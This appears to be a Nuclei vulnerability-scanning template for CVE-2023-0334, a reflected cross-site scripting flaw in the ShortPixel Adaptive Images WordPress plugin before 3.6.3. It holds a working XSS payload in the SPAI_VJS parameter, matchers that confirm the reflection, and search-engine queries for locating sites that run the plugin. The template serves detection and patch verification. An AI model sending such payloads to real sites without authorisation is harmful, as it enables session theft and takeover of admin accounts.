id: CVE-2023-0334

info:
  name: ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin
  remediation: Fixed in version 3.6.3
  reference:
    - https://wpscan.com/vulnerability/b027a8db-0fd6-444d-b14a-0ae58f04f931
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0334
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0334
    cwe-id: CWE-79
    epss-score: 0.00119
    epss-percentile: 0.46131
    cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: shortpixel
    product: shortpixel_adaptive_images
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/shortpixel-adaptive-images/
    fofa-query: body=/wp-content/plugins/shortpixel-adaptive-images/
    publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/
  tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel

http:
  - method: GET
    path:
      - "{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "shortpixel") && contains(body, "</script><img src=1 onerror=alert(document.domain)>")'
        condition: and
# digest: 490a0046304402204595baf8b6c93730879da9ec99280c85d0caf95dfce5244b6c011800c776dc3902202266e30264723cefb388a0344af08352ae8f9e12ff8341e163f81f6fbf0f9462:922c64590222798bb761d5b6d8e72950